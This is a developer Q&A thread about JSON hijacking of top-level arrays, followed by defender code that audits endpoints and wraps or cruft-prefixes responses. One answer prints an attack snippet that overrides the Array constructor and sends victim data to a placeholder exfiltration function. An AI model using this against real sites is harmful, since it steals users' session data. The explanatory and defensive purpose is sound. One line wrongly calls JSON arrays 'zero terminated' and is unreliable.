In the video below, at time marker 21:40, the Microsoft PDC presenter says it's important that all JSON be wrapped so it's not a top level array:
https://channel9.msdn.com/Events/PDC/PDC09/FT12
What is the risk of an unwrapped top level array?
How should I check and see if I'm vulnerable? I purchase many components from 3rd parties and have external vendors who develop my code.
Yes, an array is legal as top-level JSON-text.
A JSON array contains zero, one, or more ordered elements, separated by a comma. The JSON array is surrounded by square brackets `[ ]`. A JSON array is zero terminated; the first index of the array is zero (0). Therefore, the last index of the array is length - 1.
JSON arrays can be of multiple data types. A JSON array can store a string, number, boolean, object, or another array inside the JSON array. In a JSON array, values must be separated by a comma. Arrays in JSON are almost the same as arrays in JavaScript.
JSON hijacking is an attack in some ways similar to cross-site request forgery (CSRF). In the case of JSON hijacking, the attacker aims to intercept JSON data sent to the web application from the web server. Read about cross-site request forgery (CSRF) attacks.
This is because a few years ago Jeremiah Grossman found a very interesting vulnerability that affects Gmail. Some people have addressed this vulnerability by using an unparseable cruft (Mr bobince's technical description on this page is fantastic.)
The reason why Microsoft is talking about this is because they haven't patched their browser (yet). (Edit: Recent versions of Edge and IE 10/11 have addressed this issue.) Mozilla considers this to be a vulnerability in the JSON specification and therefore they patched it in Firefox 3. For the record I completely agree with Mozilla, and it's unfortunate, but each web app developer is going to have to defend themselves against this very obscure vulnerability.
I think it's because the Array() constructor can be redefined. However, that problem isn't really unique to arrays.
I think the attack (or one possible way) is something like this:

```javascript
// Attacker-controlled page redefines the global Array constructor before
// the victim's JSON is loaded via a <script> tag.
function Array(n) {
  var self = this;
  // Defer so the array literal has been populated by the time it is read.
  setTimeout(function() {
    sendToEvilHackers(self); // placeholder name used by the poster for the exfiltration step
  }, 10);
  return this;
}
```

The browser (or some browsers) use that constructor for `[n, n, n]` array notation. A CSRF attack can therefore exploit your open session with your bank, hit a known JSON URL with a `<script>` tag to fetch it, and then poof, you are owned.
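As an added example, not code from any answer above, here is a defender-side audit for the top-level-array shape the question asks about, together with the two mitigations the thread mentions (wrapping the array in an object, and the unparseable "cruft" prefix). The wrapper key `d`, the prefix string `)]}',\n`, and the sample response are assumptions constructed for this example, not values taken from the page or the PDC talk.

```javascript
// Assumed prefix: any string that is a JavaScript syntax error at statement start.
const CRUFT = ")]}',\n";

// Audit check: true when the body is valid JSON whose top-level value is an
// array, i.e. the shape a cross-site <script src=...> could evaluate as a literal.
function isTopLevelArray(body) {
  try {
    return Array.isArray(JSON.parse(body));
  } catch (e) {
    return false; // not plain JSON (for example already cruft-prefixed)
  }
}

// Mitigation 1: wrap a top-level array in an object. An object literal at
// statement position is a syntax error in a <script> tag, so it cannot be
// evaluated into the attacker's page. Non-array bodies are returned unchanged.
function wrapTopLevelArray(body) {
  const value = JSON.parse(body);
  return Array.isArray(value) ? JSON.stringify({ d: value }) : body;
}

// Mitigation 2: prefix unparseable cruft. A <script> tag fails at the prefix;
// the application's own XHR client strips it before parsing.
function addCruft(body) {
  return CRUFT + body;
}

function stripCruft(body) {
  if (!body.startsWith(CRUFT)) throw new Error("missing cruft prefix");
  return JSON.parse(body.slice(CRUFT.length));
}

// Audit a set of captured responses (url -> body) from in-house or third-party
// components and report the URLs that still serve a bare top-level array.
function auditResponses(responses) {
  return Object.entries(responses)
    .filter(([, body]) => isTopLevelArray(body))
    .map(([url]) => url);
}

// Constructed sample response, not real data.
const SAMPLE = JSON.stringify([{ id: 1, email: "alice@example.com" }]);
```

Run the audit against response bodies captured from each endpoint; anything `auditResponses` reports should be served wrapped or cruft-prefixed, and the client updated to unwrap or strip accordingly.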